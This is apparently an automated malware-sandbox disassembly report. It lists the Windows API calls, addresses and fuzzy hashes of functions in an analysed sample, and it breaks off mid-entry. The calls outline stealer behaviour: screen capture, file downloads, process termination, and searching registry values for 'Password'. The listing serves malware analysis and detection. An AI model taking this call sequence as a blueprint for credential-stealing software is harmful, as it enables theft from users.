                              Function 0059A070 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                              Download Yara Rule
                              APIs
                              • GetEnvironmentVariableA.KERNEL32(01609578,007C9BD8,0000FFFF), ref: 0059A086
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059A0B3
                              • lstrlen.KERNEL32(007C9BD8), ref: 0059A0C0
                              • lstrcpy.KERNEL32(00000000,007C9BD8), ref: 0059A0EA
                              • lstrlen.KERNEL32(005C5214), ref: 0059A0F5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059A112
                              • lstrcat.KERNEL32(00000000,005C5214), ref: 0059A11E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059A144
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0059A14F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059A174
                              • SetEnvironmentVariableA.KERNEL32(01609578,00000000), ref: 0059A18F
                              • LoadLibraryA.KERNEL32(0160DE20), ref: 0059A1A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                              • String ID:
                              • API String ID: 2929475105-0
                              • Opcode ID: a422f07cbd64e50b75fe3e76c04a54f23d741415d189e8299c86891a88166b6d
                              • Instruction ID: b654f728b5b2edd814194c988a15b5deae026b8de6e1842ccebfd819264b5168
                              • Opcode Fuzzy Hash: a422f07cbd64e50b75fe3e76c04a54f23d741415d189e8299c86891a88166b6d
                              • Instruction Fuzzy Hash: F091BE70600A019FDF609FA8DC88E663FA5FB84704F45852DE9058B261EF79DD81CBE2
                              Function 005AC940 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AC9A2
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AC9D1
                              • lstrlen.KERNEL32(00000000), ref: 005AC9FC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005ACA32
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005ACA43
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: a1d21ed4d31c473cd37dfc951afef10e4adb1588e2dcaffa93a3fdfc98cc69b4
                              • Instruction ID: 1d8eef75055eb479be48a3e410d007c92597556dddd144b51970196b8a599706
                              • Opcode Fuzzy Hash: a1d21ed4d31c473cd37dfc951afef10e4adb1588e2dcaffa93a3fdfc98cc69b4
                              • Instruction Fuzzy Hash: 9161A27190221AAFCF10EFB4C849EAE7FF8BF4A740F144169E801E7211E77599458BA1
                              Function 005B41C0 Relevance: 16.7, APIs: 11, Instructions: 178COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 005B4264
                              • GetDesktopWindow.USER32 ref: 005B426E
                              • GetWindowRect.USER32(00000000,?), ref: 005B427C
                              • SelectObject.GDI32(00000000,00000000), ref: 005B42B3
                              • GetHGlobalFromStream.COMBASE(?,?), ref: 005B4335
                              • GlobalLock.KERNEL32(?), ref: 005B4340
                              • GlobalSize.KERNEL32(?), ref: 005B434F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                              • String ID:
                              • API String ID: 1264946473-0
                              • Opcode ID: 057dac6e57ce5c0caf83ae36f23d31d4d152115890d41a27037fe2332296932f
                              • Instruction ID: 7e6979fdd748821f364c70cafb544f7b6851a26cc4fb1158effc02b196cd04f4
                              • Opcode Fuzzy Hash: 057dac6e57ce5c0caf83ae36f23d31d4d152115890d41a27037fe2332296932f
                              • Instruction Fuzzy Hash: 2A512471214305AFD750EF64DC89EAFBBA9FB88700F00891DFA8583251DB34E9458BA6
                              Function 005AE0C0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0160E838), ref: 005AE12D
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005AE157
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE18F
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE19D
                              • lstrcat.KERNEL32(?,?), ref: 005AE1B8
                              • lstrcat.KERNEL32(?,?), ref: 005AE1CC
                              • lstrcat.KERNEL32(?,015FBED0), ref: 005AE1E0
                              • lstrcat.KERNEL32(?,?), ref: 005AE1F4
                              • lstrcat.KERNEL32(?,0160DE60), ref: 005AE207
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE23F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005AE246
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 4230089145-0
                              • Opcode ID: 2dd21ff8b6ebe2a93be14abb10b85fa60a497dbe2f356acfbdbee22d6c161918
                              • Instruction ID: 0e50e152c421a48f356e086ef928a612c04aac49a352bb5ad08ec4f730920f61
                              • Opcode Fuzzy Hash: 2dd21ff8b6ebe2a93be14abb10b85fa60a497dbe2f356acfbdbee22d6c161918
                              • Instruction Fuzzy Hash: FD619E7591111DEBCF50DB64CD49ADDBBB9FF88300F1089A9A649A3240DB34AF858F50
                              Function 00596A10 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00596A3F
                              • InternetOpenA.WININET(005BD014,00000001,00000000,00000000,00000000), ref: 00596A6C
                              • StrCmpCA.SHLWAPI(?,0160EF20), ref: 00596A8A
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00596AAA
                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00596AC8
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00596AE1
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00596B06
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00596B30
                              • CloseHandle.KERNEL32(00000000), ref: 00596B50
                              • InternetCloseHandle.WININET(00000000), ref: 00596B57
                              • InternetCloseHandle.WININET(?), ref: 00596B61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                              • String ID:
                              • API String ID: 2500263513-0
                              • Opcode ID: ae9c6df6cc2d7d241f8722685166333d665383d190bd422ca6b765e33e407445
                              • Instruction ID: a9ca3faf4d6310c0243dedbe78a1825ab39be83bb7b27224fb9d1edaf4ea1d02
                              • Opcode Fuzzy Hash: ae9c6df6cc2d7d241f8722685166333d665383d190bd422ca6b765e33e407445
                              • Instruction Fuzzy Hash: ED419271A00219ABDF60DF64DC49FAE7BB9FB44700F108458FA05E7180EF74AD458BA9
                              Function 005B4520 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,005A5328), ref: 005B4565
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B456C
                              • wsprintfW.USER32 ref: 005B457B
                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 005B45EA
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 005B45F9
                              • CloseHandle.KERNEL32(00000000,?,?), ref: 005B4600
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                              • String ID: (SZ$%hs$(SZ
                              • API String ID: 885711575-2712158924
                              • Opcode ID: 1001f75ed7e994f8218792ea3a787b909d753b72cdedbf1c1ce027169c7f065d
                              • Instruction ID: 5de4e27e23ea9880b4c8021d4b7d005c23e43c50f8abfd43c2517411cc30e8f0
                              • Opcode Fuzzy Hash: 1001f75ed7e994f8218792ea3a787b909d753b72cdedbf1c1ce027169c7f065d
                              • Instruction Fuzzy Hash: 65313071A00219BBDB20DBE4DC49FDE7B78FF45700F104059F605A6181EB74AA418BA9
                              Function 0059BCE9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059BD0F
                              • lstrlen.KERNEL32(00000000), ref: 0059BD42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059BD6C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0059BD74
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059BD9C
                              • lstrlen.KERNEL32(005C509C), ref: 0059BE13
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: f454faaca8bb29c178732a72ef577609fca22d5ff3b0811e6ff2541ed08f758b
                              • Instruction ID: 0e70d6b3676ad10c19c68f719bbf0d27ac7ccf85027bf12dfc5b754c03eac399
                              • Opcode Fuzzy Hash: f454faaca8bb29c178732a72ef577609fca22d5ff3b0811e6ff2541ed08f758b
                              • Instruction Fuzzy Hash: 69A162309012069FEF14DF69DA4DAAE7BB8FF84704F19806DE5059B261DB35DC42CB94
                              Function 005B5F10 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5F5A
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5F79
                              • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 005B6044
                              • memmove.MSVCRT(00000000,00000000,?), ref: 005B60CF
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B6100
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$memmove
                              • String ID: invalid string position$string too long
                              • API String ID: 1975243496-4289949731
                              • Opcode ID: 218109dcf2b4394a5aa582a344977ab28cd258eceb7cbffbab194438d76c4d99
                              • Instruction ID: 8c88a27d89542a1e0208620c888613ec201370ca6fb61dedb140074c40b1080b
                              • Opcode Fuzzy Hash: 218109dcf2b4394a5aa582a344977ab28cd258eceb7cbffbab194438d76c4d99
                              • Instruction Fuzzy Hash: 15618070710508DBDB18DF5DC8D9AAEBBB6FF84304B244A19E4928B382D775BD808B95
                              Function 005AE169 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE18F
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE19D
                              • lstrcat.KERNEL32(?,?), ref: 005AE1B8
                              • lstrcat.KERNEL32(?,?), ref: 005AE1CC
                              • lstrcat.KERNEL32(?,015FBED0), ref: 005AE1E0
                              • lstrcat.KERNEL32(?,?), ref: 005AE1F4
                              • lstrcat.KERNEL32(?,0160DE60), ref: 005AE207
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE23F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005AE246
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFile
                              • String ID:
                              • API String ID: 3428472996-0
                              • Opcode ID: 0e8b1c484c5bf48be582b988eb6d2235f3787af9515c4ae5badfec5281b1f69a
                              • Instruction ID: a4160d6544ee5e8a93dba863c30f4a238cc98307381591df75d3129b41b01018
                              • Opcode Fuzzy Hash: 0e8b1c484c5bf48be582b988eb6d2235f3787af9515c4ae5badfec5281b1f69a
                              • Instruction Fuzzy Hash: 1A41AF75911129ABCF50EB64CC49ADD7BB8FF88300F1089A9FA4993251DB349FC58F90
                              Function 005979A0 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00597710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00597745
                                • Part of subcall function 00597710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0059778A
                                • Part of subcall function 00597710: StrStrA.SHLWAPI(?,Password), ref: 005977F8
                                • Part of subcall function 00597710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0059782C
                                • Part of subcall function 00597710: HeapFree.KERNEL32(00000000), ref: 00597833
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 005979D0
                              • lstrcat.KERNEL32(00000000,?), ref: 005979FD
                              • lstrcat.KERNEL32(00000000, : ), ref: 00597A0F
                              • lstrcat.KERNEL32(00000000,?), ref: 00597A30
                              • wsprintfA.USER32 ref: 00597A50
                              • lstrcpy.KERNEL32(00000000,?), ref: 00597A79
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00597A87
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 00597AA0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
